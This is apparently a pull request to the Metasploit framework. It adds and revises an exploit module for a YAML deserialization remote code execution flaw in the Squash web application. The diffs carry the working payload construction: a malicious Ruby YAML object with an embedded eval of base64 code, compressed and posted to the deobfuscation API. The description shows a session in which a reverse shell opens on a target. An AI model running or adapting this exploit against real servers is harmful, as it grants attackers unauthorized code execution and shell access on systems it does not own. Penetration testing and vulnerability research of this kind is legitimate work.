### PR TITLE
Squash remote code execution vulnerability

### DIFF
--- a/modules/exploits/unix/webapp/squash_yaml_exec.rb
+++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb
@@ -7,7 +7,6 @@
 
 require 'msf/core'
 require 'zlib'
-require 'base64'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
@@ -16,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Squash YAML Code Exec',
+			'Name'           => 'Squash YAML Code Execution',
 			'Description'    => %q{
 					This module exploits a remote code execution vulnerability in the
 				YAML request processor of the Squash application.
@@ -49,10 +48,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		response = send_request_cgi({
-				'uri'     => "#{datastore['TARGETURI']}api/1.0/deobfuscation",
+				'uri'     => normalize_uri(target_uri.path, '/api/1.0/deobfuscation'),
 				'method'  => 'POST',
 				'ctype'   => 'application/json',
-			}, 30)
+			})
+		
 		if response.code == 422
 			print_status("Got HTTP 422 result, target may be vulnerable")
 			return Exploit::CheckCode::Appears
@@ -63,15 +63,16 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		code = Rex::Text.encode_base64(payload.encoded)
 		yaml =	"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
-			"'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
-			": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
-		payload = Base64.encode64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")
+				"'#{rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
+				": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
+		payload = Rex::Text.encode_base64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")
 		data = "{\"api_key\":\"1\",\"environment\":\"production\",\"build\":\"1\",\"namespace\":\"#{payload}\"}"
+
 		send_request_cgi({
-			'uri'     => "#{datastore['TARGETURI']}api/1.0/deobfuscation",
+			'uri'     => normalize_uri(target_uri.path, '/api/1.0/deobfuscation'),
 			'method'  => 'POST',
 			'ctype'   => 'application/json',
 			'data'    => data
-		}, 30)
+		})
 	end
 end

--- a/modules/exploits/unix/webapp/squash_yaml_exec.rb
+++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				'method'  => 'POST',
 				'ctype'   => 'application/json',
 			})
-		
+
 		if response.code == 422
 			print_status("Got HTTP 422 result, target may be vulnerable")
 			return Exploit::CheckCode::Appears

--- a/modules/exploits/unix/webapp/squash_yaml_exec.rb
+++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					[ 'URL', 'http://ceriksen.com/2013/08/06/squash-remote-code-execution-vulnerability-advisory/'],
 					[ 'OSVDB', '95992'],
+					[ 'CVE', '2013-5036'],
 				],
 			'Platform'       => 'ruby',
 			'Arch'           => ARCH_RUBY,


### PR DESCRIPTION
Hi,

I've found a remote code execution vulnerability in the Squash(Squash.io) application. This PR adds an exploit for the vulnerability, which is a YAML unpack vuln.

msf > use exploit/unix/webapp/squash_yaml_exec 
msf exploit(squash_yaml_exec) > set RHOST 192.168.80.128
RHOST => 192.168.80.128
msf exploit(squash_yaml_exec) > set RPORT 3000
RPORT => 3000
msf exploit(squash_yaml_exec) > exploit

[_] Started reverse handler on 192.168.80.148:4444 
[_] Command shell session 1 opened (192.168.80.148:4444 -> 192.168.80.128:55229) at 2013-08-06 14:42:57 -0400
